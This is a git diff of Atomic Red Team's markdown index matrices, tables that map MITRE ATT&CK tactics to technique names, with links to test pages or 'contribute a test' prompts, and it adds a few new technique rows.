+| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1136.002/T1136.002.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | [Visual Basic](../../T1059.005/T1059.005.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [System Service Discovery](../../T1007/T1007.md) | | [Screen Capture](../../T1113/T1113.md) | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | [Windows Command Shell](../../T1059.003/T1059.003.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | [OS Credential Dumping](../../T1003/T1003.md) | [System Time Discovery](../../T1124/T1124.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | [Windows Management Instrumentation](../../T1047/T1047.md) | [Emond](../../T1546.014/T1546.014.md) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | [Password Cracking](../../T1110.002/T1110.002.md) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Remote Access Software](../../T1219/T1219.md) | |
+| | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Filter DLL](../../T1556.002/T1556.002.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Standard Encoding](../../T1132.001/T1132.001.md) | |
+| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | [External Remote Services](../../T1133/T1133.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
+| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Launch Agent](../../T1543.001/T1543.001.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | | |
+| | | Implant Container Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
+| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Launchd](../../T1053.004/T1053.004.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
+| | | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
+| | | [LD_PRELOAD](../../T1574.006/T1574.006.md) | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
+| | | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | [File Deletion](../../T1070.004/T1070.004.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
+| | | [Launch Agent](../../T1543.001/T1543.001.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
+| | | [Launch Daemon](../../T1543.004/T1543.004.md) | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | [Gatekeeper Bypass](../../T1553.001/T1553.001.md) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
+| | | [Launchd](../../T1053.004/T1053.004.md) | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
+| | | [Local Account](../../T1136.001/T1136.001.md) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | | | | | | | |
+| | | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Users](../../T1564.002/T1564.002.md) | | | | | | | |
+| | | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Window](../../T1564.003/T1564.003.md) | | | | | | | |
+| | | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Plist Modification](../../T1547.011/T1547.011.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Impair Command History Logging](../../T1562.003/T1562.003.md) | | | | | | | |
+| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Office Test](../../T1137.002/T1137.002.md) | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | | |
+| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | |
+| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Indirect Command Execution](../../T1202/T1202.md) | | | | | | | |
+| | | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Hollowing](../../T1055.012/T1055.012.md) | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | |
+| | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Injection](../../T1055/T1055.md) | [InstallUtil](../../T1218.004/T1218.004.md) | | | | | | | |
+| | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Rc.common](../../T1037.004/T1037.004.md) | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Plist Modification](../../T1547.011/T1547.011.md) | [Re-opened Applications](../../T1547.007/T1547.007.md) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | | |
+| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | | |
+| | | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Scheduled Task](../../T1053.005/T1053.005.md) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | |
+| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screensaver](../../T1546.002/T1546.002.md) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | |
+| | | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Rc.common](../../T1037.004/T1037.004.md) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Re-opened Applications](../../T1547.007/T1547.007.md) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Shortcut Modification](../../T1547.009/T1547.009.md) | [Modify Registry](../../T1112/T1112.md) | | | | | | | |
+| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Startup Items](../../T1037.005/T1037.005.md) | Modify System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Mshta](../../T1218.005/T1218.005.md) | | | | | | | |
+| | | [Scheduled Task](../../T1053.005/T1053.005.md) | [Systemd Service](../../T1543.002/T1543.002.md) | [Msiexec](../../T1218.007/T1218.007.md) | | | | | | | |
+| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Systemd Timers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTFS File Attributes](../../T1564.004/T1564.004.md) | | | | | | | |
+| | | [Screensaver](../../T1546.002/T1546.002.md) | Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Address Translation Traversal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Security Support Provider](../../T1547.005/T1547.005.md) | Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Boundary Bridging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Token Impersonation/Theft](../../T1134.001/T1134.001.md) | [Network Share Connection Removal](../../T1070.005/T1070.005.md) | | | | | | | |
+| | | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Trap](../../T1546.005/T1546.005.md) | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
+| | | [Shortcut Modification](../../T1547.009/T1547.009.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Odbcconf](../../T1218.008/T1218.008.md) | | | | | | | |
+| | | [Startup Items](../../T1037.005/T1037.005.md) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | | | | | | | |
+| | | System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Pass the Hash](../../T1550.002/T1550.002.md) | | | | | | | |
+| | | [Systemd Service](../../T1543.002/T1543.002.md) | [Windows Service](../../T1543.003/T1543.003.md) | [Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | |
+| | | Systemd Timers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Password Filter DLL](../../T1556.002/T1556.002.md) | | | | | | | |
+| | | TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Patch System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Transport Agent](../../T1505.002/T1505.002.md) | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | | | | | | | |
+| | | [Trap](../../T1546.005/T1546.005.md) | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Web Shell](../../T1505.003/T1505.003.md) | | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Windows Service](../../T1543.003/T1543.003.md) | | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | [Process Hollowing](../../T1055.012/T1055.012.md) | | | | | | | |
+| | | | | [Process Injection](../../T1055/T1055.md) | | | | | | | |
+| | | | | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | [PubPrn](../../T1216.001/T1216.001.md) | | | | | | | |
+| | | | | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | Reduce Key Space [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Regsvcs/Regasm](../../T1218.009/T1218.009.md) | | | | | | | |
| | | | | [Regsvr32](../../T1218.010/T1218.010.md) | | | | | | | |
@@ -122,6 +132,7 @@
| | | | | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | | | | | | | |
| | | | | [System Checks](../../T1497.001/T1497.001.md) | | | | | | | |
| | | | | System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Template Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
@@ -133,9 +144,12 @@
| | | | | Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | VBA Stomping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | Verclsid [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | Weaken Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md) | | | | | | | |
| | | | | [XSL Script Processing](../../T1220/T1220.md) | | | | | | | |
diff --git a/atomics/Indexes/Matrices/windows-matrix.md b/atomics/Indexes/Matrices/windows-matrix.md
index 0c3905e9..6c68ed7b 100644
--- a/atomics/Indexes/Matrices/windows-matrix.md
+++ b/atomics/Indexes/Matrices/windows-matrix.md
@@ -1,78 +1,80 @@
# Windows Atomic Tests by ATT&CK Tactic & Technique
| initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
-| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive Collected Data](../../T1560/T1560.md) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) |
-| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Window Discovery](../../T1010/T1010.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Transfer Size Limits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Alternative Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
-| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| [External Remote Services](../../T1133/T1133.md) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [File and Directory Discovery](../../T1083/T1083.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
